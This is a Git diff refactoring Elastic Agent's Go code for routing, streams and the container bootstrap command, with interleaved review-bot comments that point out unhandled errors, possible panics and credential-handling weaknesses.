-45,7 +34,7 @@ func newRouter(log *logger.Logger, factory streamFunc) (*router, error) { return &router{log: log, streamFactory: factory, routes: sorted.NewSet()}, nil } -func (r *router) Dispatch(id string, grpProg map[routingKey][]program.Program) error { +func (r *router) Route(id string, grpProg map[pipeline.RoutingKey][]program.Program) error { s := sorted.NewSet() // Make sure that starting and updating is always done in the same order. 
@@ -84,7 +73,7 @@ func (r *router) Dispatch(id string, grpProg map[routingKey][]program.Program) e strings.Join(req.ProgramNames(), ", "), ) - err = p.(stream).Execute(req) + err = p.(pipeline.Stream).Execute(req) if err != nil { return err } @@ -106,7 +95,7 @@ func (r *router) Dispatch(id string, grpProg map[routingKey][]program.Program) e r.log.Debugf("Removing routing key %s", k) - p.(stream).Close() + p.(pipeline.Stream).Close() r.routes.Remove(k) } @@ -121,7 +110,7 @@ func (r *router) Shutdown() { if !ok { continue } - p.(stream).Shutdown() + p.(pipeline.Stream).Shutdown() r.routes.Remove(k) } } diff --git a/x-pack/elastic-agent/pkg/agent/application/router_test.go b/x-pack/elastic-agent/pkg/agent/application/pipeline/router/router_test.go similarity index 63% rename from x-pack/elastic-agent/pkg/agent/application/router_test.go rename to x-pack/elastic-agent/pkg/agent/application/pipeline/router/router_test.go index 2de86d0c769..421a0f4cc91 100644 --- a/x-pack/elastic-agent/pkg/agent/application/router_test.go +++ b/x-pack/elastic-agent/pkg/agent/application/pipeline/router/router_test.go @@ -2,13 +2,14 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package router import ( "testing" "github.com/stretchr/testify/require" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configrequest" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/program" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" 
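Review bot: In the routing-key removal path (hunk `@@ -106,7 +95,7 @@`) the error returned by `p.(pipeline.Stream).Close()` is dropped, so a stream that fails to stop is removed from `r.routes` with no trace. Since `pipeline.Stream.Close` returns an error, log it with the logger the hunk already uses: `if err := p.(pipeline.Stream).Close(); err != nil { r.log.Errorf("closing stream for routing key %s: %v", k, err) }`. The same unchecked `p.(pipeline.Stream)` assertion appears in the `Execute` and `Shutdown` hunks on this line and panics if anything else is ever stored in the set; the comma-ok form would turn that into a handled error. The bodies of `Route` and `Shutdown` start outside these hunks.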
@@ -36,39 +37,39 @@ func (r *rOp) String() string { } type event struct { - rk routingKey + rk pipeline.RoutingKey op rOp } -type notifyFunc func(routingKey, rOp, ...interface{}) +type notifyFunc func(pipeline.RoutingKey, rOp, ...interface{}) func TestRouter(t *testing.T) { programs := []program.Program{program.Program{Spec: program.Supported[1]}} t.Run("create new and destroy unused stream", func(t *testing.T) { recorder := &recorder{} - r, err := newRouter(nil, recorder.factory) + r, err := New(nil, recorder.factory) require.NoError(t, err) - r.Dispatch("hello", map[routingKey][]program.Program{ - defautlRK: programs, + r.Route("hello", map[pipeline.RoutingKey][]program.Program{ + pipeline.DefaultRK: programs, }) assertOps(t, []event{ - e(defautlRK, createOp), - e(defautlRK, executeOp), + e(pipeline.DefaultRK, createOp), + e(pipeline.DefaultRK, executeOp), }, recorder.events) recorder.reset() nk := "NEW_KEY" - r.Dispatch("hello-2", map[routingKey][]program.Program{ + r.Route("hello-2", map[pipeline.RoutingKey][]program.Program{ nk: programs, }) assertOps(t, []event{ e(nk, createOp), e(nk, executeOp), - e(defautlRK, closeOp), + e(pipeline.DefaultRK, closeOp), }, recorder.events) }) 
@@ -77,29 +78,29 @@ func TestRouter(t *testing.T) { k2 := "KEY_2" recorder := &recorder{} - r, err := newRouter(nil, recorder.factory) + r, err := New(nil, recorder.factory) require.NoError(t, err) - r.Dispatch("hello", map[routingKey][]program.Program{ - defautlRK: programs, - k1: programs, - k2: programs, + r.Route("hello", map[pipeline.RoutingKey][]program.Program{ + pipeline.DefaultRK: programs, + k1: programs, + k2: programs, }) assertOps(t, []event{ - e(defautlRK, createOp), - e(defautlRK, executeOp), - e(k1, createOp), e(k1, executeOp), e(k2, createOp), e(k2, executeOp), + + e(pipeline.DefaultRK, createOp), + e(pipeline.DefaultRK, executeOp), }, recorder.events) recorder.reset() nk := "SECOND_DISPATCH" - r.Dispatch("hello-2", map[routingKey][]program.Program{ + r.Route("hello-2", map[pipeline.RoutingKey][]program.Program{ nk: programs, }) @@ -107,33 +108,33 @@ func TestRouter(t *testing.T) { e(nk, createOp), e(nk, executeOp), - e(defautlRK, closeOp), e(k1, closeOp), e(k2, closeOp), + e(pipeline.DefaultRK, closeOp), }, recorder.events) }) t.Run("create new and delegate program to existing stream", func(t *testing.T) { recorder := &recorder{} - r, err := newRouter(nil, recorder.factory) + r, err := New(nil, recorder.factory) require.NoError(t, err) - r.Dispatch("hello", map[routingKey][]program.Program{ - defautlRK: programs, + r.Route("hello", map[pipeline.RoutingKey][]program.Program{ + pipeline.DefaultRK: programs, }) assertOps(t, []event{ - e(defautlRK, createOp), - e(defautlRK, executeOp), + e(pipeline.DefaultRK, createOp), + e(pipeline.DefaultRK, executeOp), }, recorder.events) recorder.reset() - r.Dispatch("hello-2", map[routingKey][]program.Program{ - defautlRK: programs, + r.Route("hello-2", map[pipeline.RoutingKey][]program.Program{ + pipeline.DefaultRK: programs, }) assertOps(t, []event{ - e(defautlRK, executeOp), + e(pipeline.DefaultRK, executeOp), }, recorder.events) }) 
@@ -142,31 +143,31 @@ func TestRouter(t *testing.T) { k2 := "KEY_2" recorder := &recorder{} - r, err := newRouter(nil, recorder.factory) + r, err := New(nil, recorder.factory) require.NoError(t, err) - r.Dispatch("hello", map[routingKey][]program.Program{ - defautlRK: programs, - k1: programs, - k2: programs, + r.Route("hello", map[pipeline.RoutingKey][]program.Program{ + pipeline.DefaultRK: programs, + k1: programs, + k2: programs, }) assertOps(t, []event{ - e(defautlRK, createOp), - e(defautlRK, executeOp), e(k1, createOp), e(k1, executeOp), e(k2, createOp), e(k2, executeOp), + e(pipeline.DefaultRK, createOp), + e(pipeline.DefaultRK, executeOp), }, recorder.events) recorder.reset() - r.Dispatch("hello-2", map[routingKey][]program.Program{}) + r.Route("hello-2", map[pipeline.RoutingKey][]program.Program{}) assertOps(t, []event{ - e(defautlRK, closeOp), e(k1, closeOp), e(k2, closeOp), + e(pipeline.DefaultRK, closeOp), }, recorder.events) }) } @@ -175,11 +176,11 @@ type recorder struct { events []event } -func (r *recorder) factory(_ *logger.Logger, rk routingKey) (stream, error) { +func (r *recorder) factory(_ *logger.Logger, rk pipeline.RoutingKey) (pipeline.Stream, error) { return newMockStream(rk, r.notify), nil } -func (r *recorder) notify(rk routingKey, op rOp, args ...interface{}) { +func (r *recorder) notify(rk pipeline.RoutingKey, op rOp, args ...interface{}) { r.events = append(r.events, e(rk, op)) } @@ -188,11 +189,11 @@ func (r *recorder) reset() { } type mockStream struct { - rk routingKey + rk pipeline.RoutingKey notify notifyFunc } -func newMockStream(rk routingKey, notify notifyFunc) *mockStream { +func newMockStream(rk pipeline.RoutingKey, notify notifyFunc) *mockStream { notify(rk, createOp) return &mockStream{ rk: rk, 
@@ -221,6 +222,6 @@ func assertOps(t *testing.T, expected []event, received []event) { require.Equal(t, expected, received) } -func e(rk routingKey, op rOp) event { +func e(rk pipeline.RoutingKey, op rOp) event { return event{rk: rk, op: op} } diff --git a/x-pack/elastic-agent/pkg/agent/application/stream.go b/x-pack/elastic-agent/pkg/agent/application/pipeline/stream/factory.go similarity index 71% rename from x-pack/elastic-agent/pkg/agent/application/stream.go rename to x-pack/elastic-agent/pkg/agent/application/pipeline/stream/factory.go index 4bdb21f32ed..70258ed1794 100644 --- a/x-pack/elastic-agent/pkg/agent/application/stream.go +++ b/x-pack/elastic-agent/pkg/agent/application/pipeline/stream/factory.go @@ -2,13 +2,13 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package stream import ( "context" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/info" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configrequest" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configuration" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/operation" 
@@ -24,26 +24,9 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/release" ) -type operatorStream struct { - configHandler ConfigHandler - log *logger.Logger - monitor monitoring.Monitor -} - -func (b *operatorStream) Close() error { - return b.configHandler.Close() -} - -func (b *operatorStream) Execute(cfg configrequest.Request) error { - return b.configHandler.HandleConfig(cfg) -} - -func (b *operatorStream) Shutdown() { - b.configHandler.Shutdown() -} - -func streamFactory(ctx context.Context, agentInfo *info.AgentInfo, cfg *configuration.SettingsConfig, srv *server.Server, r state.Reporter, m monitoring.Monitor, statusController status.Controller) func(*logger.Logger, routingKey) (stream, error) { - return func(log *logger.Logger, id routingKey) (stream, error) { +// Factory creates a new stream factory. +func Factory(ctx context.Context, agentInfo *info.AgentInfo, cfg *configuration.SettingsConfig, srv *server.Server, r state.Reporter, m monitoring.Monitor, statusController status.Controller) func(*logger.Logger, pipeline.RoutingKey) (pipeline.Stream, error) { + return func(log *logger.Logger, id pipeline.RoutingKey) (pipeline.Stream, error) { // new operator per stream to isolate processes without using tags operator, err := newOperator(ctx, log, agentInfo, id, cfg, srv, r, m, statusController) if err != nil { 
@@ -57,7 +40,7 @@ func streamFactory(ctx context.Context, agentInfo *info.AgentInfo, cfg *configur } } -func newOperator(ctx context.Context, log *logger.Logger, agentInfo *info.AgentInfo, id routingKey, config *configuration.SettingsConfig, srv *server.Server, r state.Reporter, m monitoring.Monitor, statusController status.Controller) (*operation.Operator, error) { +func newOperator(ctx context.Context, log *logger.Logger, agentInfo *info.AgentInfo, id pipeline.RoutingKey, config *configuration.SettingsConfig, srv *server.Server, r state.Reporter, m monitoring.Monitor, statusController status.Controller) (*operation.Operator, error) { fetcher := downloader.NewDownloader(log, config.DownloadConfig) allowEmptyPgp, pgp := release.PGP() verifier, err := downloader.NewVerifier(log, config.DownloadConfig, allowEmptyPgp, pgp) diff --git a/x-pack/elastic-agent/pkg/agent/application/pipeline/stream/operator_stream.go b/x-pack/elastic-agent/pkg/agent/application/pipeline/stream/operator_stream.go new file mode 100644 index 00000000000..519a7b6bb52 --- /dev/null +++ b/x-pack/elastic-agent/pkg/agent/application/pipeline/stream/operator_stream.go 
@@ -0,0 +1,28 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package stream + +import ( + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configrequest" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" +) + +type operatorStream struct { + configHandler pipeline.ConfigHandler + log *logger.Logger +} + +func (b *operatorStream) Close() error { + return b.configHandler.Close() +} + +func (b *operatorStream) Execute(cfg configrequest.Request) error { + return b.configHandler.HandleConfig(cfg) +} + +func (b *operatorStream) Shutdown() { + b.configHandler.Shutdown() +} diff --git a/x-pack/elastic-agent/pkg/agent/application/upgrade/crash_checker_test.go b/x-pack/elastic-agent/pkg/agent/application/upgrade/crash_checker_test.go index b297431456e..811c75bf3b0 100644 --- a/x-pack/elastic-agent/pkg/agent/application/upgrade/crash_checker_test.go +++ b/x-pack/elastic-agent/pkg/agent/application/upgrade/crash_checker_test.go @@ -129,7 +129,7 @@ func TestChecker(t *testing.T) { func testableChecker(t *testing.T, pider *testPider) (*CrashChecker, chan error) { errChan := make(chan error, 1) - l, _ := logger.New("") + l, _ := logger.New("", false) ch, err := NewCrashChecker(context.Background(), errChan, l) require.NoError(t, err) diff --git a/x-pack/elastic-agent/pkg/agent/cmd/common.go b/x-pack/elastic-agent/pkg/agent/cmd/common.go index 60f01cadf15..753bf61e6be 100644 --- a/x-pack/elastic-agent/pkg/agent/cmd/common.go +++ b/x-pack/elastic-agent/pkg/agent/cmd/common.go 
@@ -7,37 +7,16 @@ package cmd import ( "flag" "os" - "path/filepath" "github.com/spf13/cobra" // import logp flags _ "github.com/elastic/beats/v7/libbeat/logp/configure" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/paths" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/basecmd" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/cli" ) -const ( - defaultConfig = "elastic-agent.yml" - hashLen = 6 - commitFile = ".elastic-agent.active.commit" - agentLockFileName = "agent.lock" -) - -type globalFlags struct { - PathConfigFile string -} - -// Config returns path which identifies configuration file. -func (f *globalFlags) Config() string { - if len(f.PathConfigFile) == 0 || f.PathConfigFile == defaultConfig { - return filepath.Join(paths.Config(), defaultConfig) - } - return f.PathConfigFile -} - // NewCommand returns the default command for the agent. func NewCommand() *cobra.Command { return NewCommandWithArgs(os.Args, cli.NewIOStreams()) @@ -49,13 +28,13 @@ func NewCommandWithArgs(args []string, streams *cli.IOStreams) *cobra.Command { Use: "elastic-agent [subcommand]", } - flags := &globalFlags{} - // path flags cmd.PersistentFlags().AddGoFlag(flag.CommandLine.Lookup("path.home")) + cmd.PersistentFlags().AddGoFlag(flag.CommandLine.Lookup("path.home.unversioned")) + cmd.PersistentFlags().MarkHidden("path.home.unversioned") // hidden used internally by container subcommand cmd.PersistentFlags().AddGoFlag(flag.CommandLine.Lookup("path.config")) + cmd.PersistentFlags().AddGoFlag(flag.CommandLine.Lookup("c")) cmd.PersistentFlags().AddGoFlag(flag.CommandLine.Lookup("path.logs")) - cmd.PersistentFlags().StringVarP(&flags.PathConfigFile, "c", "c", defaultConfig, `Configuration file, relative to path.config`) // logging flags cmd.PersistentFlags().AddGoFlag(flag.CommandLine.Lookup("v")) 
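Review bot: `flag.CommandLine.Lookup` returns nil for a flag that has not been registered, and the two new lookups (`"path.home.unversioned"` and `"c"`) are passed straight to `AddGoFlag`, which would most likely panic on a nil flag when the command is constructed. This file no longer imports `paths`, so the registration now depends on some other import in the binary; where it happens is not visible in this hunk. A guard such as `if f := flag.CommandLine.Lookup("c"); f != nil { cmd.PersistentFlags().AddGoFlag(f) }` makes that dependency explicit. The error returned by `MarkHidden("path.home.unversioned")` is also discarded; an explicit check, or `_ =` with a comment, would show that this is deliberate.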
@@ -64,19 +43,20 @@ func NewCommandWithArgs(args []string, streams *cli.IOStreams) *cobra.Command { cmd.PersistentFlags().AddGoFlag(flag.CommandLine.Lookup("environment")) // sub-commands - run := newRunCommandWithArgs(flags, args, streams) + run := newRunCommandWithArgs(args, streams) cmd.AddCommand(basecmd.NewDefaultCommandsWithArgs(args, streams)...) cmd.AddCommand(run) - cmd.AddCommand(newInstallCommandWithArgs(flags, args, streams)) - cmd.AddCommand(newUninstallCommandWithArgs(flags, args, streams)) - cmd.AddCommand(newUpgradeCommandWithArgs(flags, args, streams)) - cmd.AddCommand(newEnrollCommandWithArgs(flags, args, streams)) - cmd.AddCommand(newInspectCommandWithArgs(flags, args, streams)) - cmd.AddCommand(newWatchCommandWithArgs(flags, args, streams)) - cmd.AddCommand(newContainerCommand(flags, args, streams)) + cmd.AddCommand(newInstallCommandWithArgs(args, streams)) + cmd.AddCommand(newUninstallCommandWithArgs(args, streams)) + cmd.AddCommand(newUpgradeCommandWithArgs(args, streams)) + cmd.AddCommand(newEnrollCommandWithArgs(args, streams)) + cmd.AddCommand(newInspectCommandWithArgs(args, streams)) + cmd.AddCommand(newWatchCommandWithArgs(args, streams)) + cmd.AddCommand(newContainerCommand(args, streams)) + cmd.AddCommand(newStatusCommand(args, streams)) // windows special hidden sub-command (only added on windows) - reexec := newReExecWindowsCommand(flags, args, streams) + reexec := newReExecWindowsCommand(args, streams) if reexec != nil { cmd.AddCommand(reexec) } diff --git a/x-pack/elastic-agent/pkg/agent/cmd/container.go b/x-pack/elastic-agent/pkg/agent/cmd/container.go index fdbbaa213a4..b1902010ae3 100644 --- a/x-pack/elastic-agent/pkg/agent/cmd/container.go +++ b/x-pack/elastic-agent/pkg/agent/cmd/container.go 
@@ -6,35 +6,43 @@ package cmd import ( "bytes" + "context" "encoding/json" "fmt" "io" + "io/ioutil" "net/url" "os" "os/exec" + "path/filepath" "regexp" "strings" + "sync" + "syscall" "time" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configuration" + "github.com/spf13/cobra" "github.com/elastic/beats/v7/libbeat/common/transport/tlscommon" "github.com/elastic/beats/v7/libbeat/kibana" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/paths" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/program" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/artifact" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/artifact/install/tar" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/cli" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/process" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/release" ) const ( - defaultKibanaHost = "http://kibana:5601" - defaultESHost = "http://elasticsearch:9200" - defaultUsername = "elastic" - defaultPassword = "changeme" - defaultTokenName = "Default" - - requestRetrySleep = 1 * time.Second // sleep 1 sec between retries for HTTP requests - maxRequestRetries = 30 // maximum number of retries for HTTP requests + requestRetrySleep = 1 * time.Second // sleep 1 sec between retries for HTTP requests + maxRequestRetries = 30 // maximum number of retries for HTTP requests + defaultStateDirectory = "/usr/share/elastic-agent/state" // directory that will hold the state data ) var ( 
@@ -43,8 +51,8 @@ var ( tokenNameStrip = regexp.MustCompile(`\s\([0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}\)$`) ) -func newContainerCommand(flags *globalFlags, _ []string, streams *cli.IOStreams) *cobra.Command { - return &cobra.Command{ +func newContainerCommand(_ []string, streams *cli.IOStreams) *cobra.Command { + cmd := cobra.Command{ Hidden: true, // not exposed over help; used by container entrypoint only Use: "container", Short: "Bootstrap Elastic Agent to run inside of a container", 
@@ -112,15 +120,98 @@ all the above actions will be skipped, because the Elastic Agent has already bee occurs on every start of the container set FLEET_FORCE to 1. `, Run: func(c *cobra.Command, args []string) { - if err := containerCmd(streams, c, flags, args); err != nil { - fmt.Fprintf(streams.Err, "Error: %v\n", err) + if err := containerCmd(streams, c); err != nil { + logError(streams, err) os.Exit(1) } }, } + return &cmd +} + +func logError(streams *cli.IOStreams, err error) { + fmt.Fprintf(streams.Err, "Error: %v\n", err) } -func containerCmd(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, args []string) error { +func logInfo(streams *cli.IOStreams, msg string) { + fmt.Fprintln(streams.Out, msg) +} + +func containerCmd(streams *cli.IOStreams, cmd *cobra.Command) error { + // set paths early so all action below use the defined paths + if err := setPaths(); err != nil { + return err + } + + // create access configuration from ENV and config files + cfg := defaultAccessConfig() + for _, f := range []string{"fleet-setup.yml", "credentials.yml"} { + c, err := config.LoadFile(filepath.Join(paths.Config(), f)) + if err != nil && !os.IsNotExist(err) { + return fmt.Errorf("parsing config file(%s): %s", f, err) + } + if c != nil { + err = c.Unpack(&cfg) + if err != nil { + return fmt.Errorf("unpacking config file(%s): %s", f, err) + } + } + } + + // start apm-server legacy process when in cloud mode + var wg sync.WaitGroup + var apmProc *process.Info + _, elasticCloud := os.LookupEnv("ELASTIC_AGENT_CLOUD") + apmPath := os.Getenv("APM_SERVER_PATH") + if elasticCloud { + logInfo(streams, "Starting in elastic cloud mode") + if elasticCloud && apmPath != "" { + // run legacy APM Server as a daemon; send termination signal + // to the main process if the daemon is stopped + mainProc, err := os.FindProcess(os.Getpid()) + if err != nil { + return errors.New(err, "finding current process") + } + if apmProc, err = runLegacyAPMServer(streams, apmPath); err != 
nil { + return errors.New(err, "starting legacy apm-server") + } + wg.Add(1) // apm-server legacy process + logInfo(streams, "Legacy apm-server daemon started.") + go func() { + if err := func() error { + apmProcState, err := apmProc.Process.Wait() + if err != nil { + return err + } + if apmProcState.ExitCode() != 0 { + return fmt.Errorf("apm-server process exited with %d", apmProcState.ExitCode()) + } + return nil + }(); err != nil { + logError(streams, err) + } + + wg.Done() + // sending kill signal to current process (elastic-agent) + logInfo(streams, "Initiate shutdown elastic-agent.") + mainProc.Signal(syscall.SIGTERM) + }() + + defer func() { + if apmProc != nil { + apmProc.Stop() + logInfo(streams, "Initiate shutdown legacy apm-server.") + } + wg.Wait() + }() + } + } + + // run the main elastic-agent container command + return runContainerCmd(streams, cmd, cfg) +} + +func runContainerCmd(streams *cli.IOStreams, cmd *cobra.Command, cfg setupConfig) error { var err error var client *kibana.Client executable, err := os.Executable() 
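Review bot: The goroutine that waits on the legacy apm-server discards the result of `mainProc.Signal(syscall.SIGTERM)`, so if the signal cannot be delivered the agent keeps running without the daemon it was supervising and nothing is reported. Report the failure with the helper added in this hunk: `if err := mainProc.Signal(syscall.SIGTERM); err != nil { logError(streams, err) }`. The inner condition `if elasticCloud && apmPath != ""` repeats `elasticCloud`, which the enclosing `if` has already established, and can be `if apmPath != ""`. `APM_SERVER_PATH` is taken from the environment and handed to `runLegacyAPMServer`, whose body is outside this hunk, so whether the path is checked before it is executed cannot be confirmed here.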
@@ -129,40 +220,37 @@ func containerCmd(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags } _, err = os.Stat(paths.AgentConfigFile()) - if !os.IsNotExist(err) && !envBool("FLEET_FORCE") { + if !os.IsNotExist(err) && !cfg.Fleet.Force { // already enrolled, just run the standard run - return run(flags, streams) + return run(streams, logToStderr) } - // Remove FLEET_SETUP in 8.x - // The FLEET_SETUP environment variable boolean is a fallback to the old name. The name was updated to - // reflect that its setting up Fleet in Kibana versus setting up Fleet Server. - if envBool("KIBANA_FLEET_SETUP", "FLEET_SETUP") { - client, err = kibanaClient() + if cfg.Kibana.Fleet.Setup { + client, err = kibanaClient(cfg.Kibana) if err != nil { return err } - fmt.Fprintf(streams.Out, "Performing setup of Fleet in Kibana\n") + logInfo(streams, "Performing setup of Fleet in Kibana\n") err = kibanaSetup(client, streams) if err != nil { return err } } - if envBool("FLEET_ENROLL", "FLEET_SERVER_ENABLE") { + if cfg.Fleet.Enroll { if client == nil { - client, err = kibanaClient() + client, err = kibanaClient(cfg.Kibana) if err != nil { return err } } var policy *kibanaPolicy - token := envWithDefault("", "FLEET_ENROLLMENT_TOKEN") + token := cfg.Fleet.EnrollmentToken if token == "" { - policy, err = kibanaFetchPolicy(client, streams) + policy, err = kibanaFetchPolicy(client, cfg, streams) if err != nil { return err } - token, err = kibanaFetchToken(client, policy, streams) + token, err = kibanaFetchToken(client, policy, streams, cfg.Fleet.TokenName) if err != nil { return err } @@ -171,7 +259,7 @@ func containerCmd(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags if policy != nil { policyID = policy.ID } - cmdArgs, err := buildEnrollArgs(token, policyID) + cmdArgs, err := buildEnrollArgs(cfg, token, policyID) if err != nil { return err } 
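Review bot: The enrolled check `if !os.IsNotExist(err) && !cfg.Fleet.Force` treats every `os.Stat` failure other than not-exist (a permission error on the config path, for example) as "already enrolled" and goes straight to `run(streams, logToStderr)`, skipping setup and enrollment. Testing for success states the intent directly: `if err == nil && !cfg.Fleet.Force {`, with `else if err != nil && !os.IsNotExist(err) { return err }` for the unexpected case. Separately, `logInfo` already ends the line via `Fprintln`, so the trailing `\n` in `"Performing setup of Fleet in Kibana\n"` prints a blank line. `runContainerCmd` starts before this hunk and continues after it.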
@@ -188,70 +276,68 @@ func containerCmd(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags } } - return run(flags, streams) + return run(streams, logToStderr) } -func buildEnrollArgs(token string, policyID string) ([]string, error) { - args := []string{"enroll", "-f"} - if envBool("FLEET_SERVER_ENABLE") { - connStr, err := buildFleetServerConnStr() +func buildEnrollArgs(cfg setupConfig, token string, policyID string) ([]string, error) { + args := []string{ + "enroll", "-f", + "-c", paths.ConfigFile(), + "--path.home", paths.Top(), // --path.home actually maps to paths.Top() + "--path.config", paths.Config(), + "--path.logs", paths.Logs(), + } + if !paths.IsVersionHome() { + args = append(args, "--path.home.unversioned") + } + if cfg.FleetServer.Enable { + connStr, err := buildFleetServerConnStr(cfg.FleetServer) if err != nil { return nil, err } args = append(args, "--fleet-server", connStr) if policyID == "" { - policyID = envWithDefault("", "FLEET_SERVER_POLICY_ID") + policyID = cfg.FleetServer.PolicyID } if policyID != "" { args = append(args, "--fleet-server-policy", policyID) } - ca := envWithDefault("", "FLEET_SERVER_ELASTICSEARCH_CA", "ELASTICSEARCH_CA") - if ca != "" { - args = append(args, "--fleet-server-elasticsearch-ca", ca) + if cfg.FleetServer.Elasticsearch.CA != "" { + args = append(args, "--fleet-server-elasticsearch-ca", cfg.FleetServer.Elasticsearch.CA) } - host := envWithDefault("", "FLEET_SERVER_HOST") - if host != "" { - args = append(args, "--fleet-server-host", host) + if cfg.FleetServer.Host != "" { + args = append(args, "--fleet-server-host", cfg.FleetServer.Host) } - port := envWithDefault("", "FLEET_SERVER_PORT") - if port != "" { - args = append(args, "--fleet-server-port", port) + if cfg.FleetServer.Port != "" { + args = append(args, "--fleet-server-port", cfg.FleetServer.Port) } - cert := envWithDefault("", "FLEET_SERVER_CERT") - if cert != "" { - args = append(args, "--fleet-server-cert", cert) + if cfg.FleetServer.Cert != 
"" { + args = append(args, "--fleet-server-cert", cfg.FleetServer.Cert) } - certKey := envWithDefault("", "FLEET_SERVER_CERT_KEY") - if certKey != "" { - args = append(args, "--fleet-server-cert-key", certKey) + if cfg.FleetServer.CertKey != "" { + args = append(args, "--fleet-server-cert-key", cfg.FleetServer.CertKey) } - if envBool("FLEET_SERVER_INSECURE_HTTP") { + if cfg.FleetServer.InsecureHTTP { args = append(args, "--fleet-server-insecure-http") args = append(args, "--insecure") } } else { - url := envWithDefault("", "FLEET_URL") - if url == "" { + if cfg.Fleet.URL == "" { return nil, errors.New("FLEET_URL is required when FLEET_ENROLL is true without FLEET_SERVER_ENABLE") } - args = append(args, "--url", url) - if envBool("FLEET_INSECURE") { + args = append(args, "--url", cfg.Fleet.URL) + if cfg.Fleet.Insecure { args = append(args, "--insecure") } - ca := envWithDefault("", "FLEET_CA", "KIBANA_CA", "ELASTICSEARCH_CA") - if ca != "" { - args = append(args, "--certificate-authorities", ca) + if cfg.Fleet.CA != "" { + args = append(args, "--certificate-authorities", cfg.Fleet.CA) } } - args = append(args, "--enrollment-token", token) - return args, nil + return append(args, "--enrollment-token", token), nil } -func buildFleetServerConnStr() (string, error) { - host := envWithDefault(defaultESHost, "FLEET_SERVER_ELASTICSEARCH_HOST", "ELASTICSEARCH_HOST") - username := envWithDefault(defaultUsername, "FLEET_SERVER_ELASTICSEARCH_USERNAME", "ELASTICSEARCH_USERNAME") - password := envWithDefault(defaultPassword, "FLEET_SERVER_ELASTICSEARCH_PASSWORD", "ELASTICSEARCH_PASSWORD") - u, err := url.Parse(host) +func buildFleetServerConnStr(cfg fleetServerConfig) (string, error) { + u, err := url.Parse(cfg.Elasticsearch.Host) if err != nil { return "", err } 
@@ -259,7 +345,7 @@ func buildFleetServerConnStr() (string, error) { if u.Path != "" { path += "/" + strings.TrimLeft(u.Path, "/") } - return fmt.Sprintf("%s://%s:%s@%s%s", u.Scheme, username, password, u.Host, path), nil + return fmt.Sprintf("%s://%s:%s@%s%s", u.Scheme, cfg.Elasticsearch.Username, cfg.Elasticsearch.Password, u.Host, path), nil } func kibanaSetup(client *kibana.Client, streams *cli.IOStreams) error { @@ -274,22 +360,22 @@ func kibanaSetup(client *kibana.Client, streams *cli.IOStreams) error { return nil } -func kibanaFetchPolicy(client *kibana.Client, streams *cli.IOStreams) (*kibanaPolicy, error) { +func kibanaFetchPolicy(client *kibana.Client, cfg setupConfig, streams *cli.IOStreams) (*kibanaPolicy, error) { var policies kibanaPolicies err := performGET(client, "/api/fleet/agent_policies", &policies, streams.Err, "Kibana fetch policy") if err != nil { return nil, err } - return findPolicy(policies.Items) + return findPolicy(cfg, policies.Items) } -func kibanaFetchToken(client *kibana.Client, policy *kibanaPolicy, streams *cli.IOStreams) (string, error) { +func kibanaFetchToken(client *kibana.Client, policy *kibanaPolicy, streams *cli.IOStreams, tokenName string) (string, error) { var keys kibanaAPIKeys err := performGET(client, "/api/fleet/enrollment-api-keys", &keys, streams.Err, "Kibana fetch token") if err != nil { return "", err } - key, err := findKey(keys.List, policy) + key, err := findKey(keys.List, policy, tokenName) if err != nil { return "", err } 
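Review bot: The connection string is assembled with `fmt.Sprintf("%s://%s:%s@%s%s", ...)` from the raw username and password, so a credential containing `@`, `:`, `/` or `#` yields a URL whose userinfo and host boundaries are ambiguous when it is parsed again downstream. `net/url` is already in use in this function; let it do the escaping with `userinfo := url.UserPassword(cfg.Elasticsearch.Username, cfg.Elasticsearch.Password)` and then `fmt.Sprintf("%s://%s@%s%s", u.Scheme, userinfo, u.Host, path)`. The result carries the password, and `buildEnrollArgs` passes it as the `--fleet-server` argument, so if those arguments are run as a child process it is readable from the process argument list and should be kept out of any log or error text; how the arguments are executed is outside the visible hunks. `buildFleetServerConnStr` begins in the previous hunk.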
